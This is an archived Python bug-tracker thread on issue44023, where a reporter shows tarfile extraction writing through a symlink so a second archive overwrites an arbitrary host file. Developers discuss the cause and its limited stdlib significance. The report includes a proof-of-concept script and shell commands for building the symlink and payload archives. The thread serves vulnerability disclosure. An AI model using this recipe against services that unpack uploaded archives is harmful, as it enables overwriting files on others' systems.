[issue44023] "tarfile" library will lead to "write any content to any file on the host".

2021-05-07 Thread Gregory P. Smith 


Gregory P. Smith  added the comment:

TL;DR - A tar file being extracted doesn't check to see if it is overwriting an 
existing file, which could be a symlink to elsewhere leading to elsewhere's 
contents being clobbered assuming the elsewhere file exists.

doing an unlink before opening the destination file (ignoring either success or 
FileNotFound) during extract would avoid this _specific_ case.

But tarfile is already documented with a warning about untrusted inputs being 
able to do bad things:

https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

fixing this one serialized case doesn't do anything about other cases or race 
conditions we won't claim protection against, so I'm not sure this issue is 
serious from a stdlib perspective.

--
nosy: +gregory.p.smith

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue44023] "tarfile" library will lead to "write any content to any file on the host".

2021-05-07 Thread Éric Araujo 

Éric Araujo  added the comment:

Can you contact the security team (info at https://www.python.org/dev/security/ 
) directly?

In general, tarfile (and other Python file functions!) can create files 
anywhere on the filesystem, provided that the process user has the right 
permissions.  But it seems that you’re talking about an unexpected behaviour 
leading to unwanted operations, so please send more details about the problem 
to the team.  Thank you for your report!

--
nosy: +eric.araujo

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue44023] "tarfile" library will lead to "write any content to any file on the host".

2021-05-03 Thread guangli dong 


New submission from guangli dong :

if uncompress file twice to the same dir, attacker can "write any content to 
any file on the host"".

poc code like below:
```
import tarfile


dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz"  # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz 
test_tar/a
file2_name = "/tmp/b.tar.gz"  # echo "it is just poc" > /tmp/payload; rm -rf 
test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a


def vuln_tar(tar_path):
"""
:param tar_path:
:return:
"""
import tarfile
tar = tarfile.open(tar_path, "r:tar")
file_names = tar.getnames()
for file_name in file_names:
tar.extract(file_name, dir_name)
tar.close()


vuln_tar(file1_name)
vuln_tar(file2_name)
```

in this poc code, if one service uncompress tar file which is uploaded by 
attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is 
just poc" string into "/tmp/a" file.

--
components: Library (Lib)
files: poc.tar.gz
messages: 392827
nosy: leveryd
priority: normal
severity: normal
status: open
title: "tarfile" library will lead to "write any content to any file on the 
host".
type: security
versions: Python 3.7
Added file: https://bugs.python.org/file50005/poc.tar.gz

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com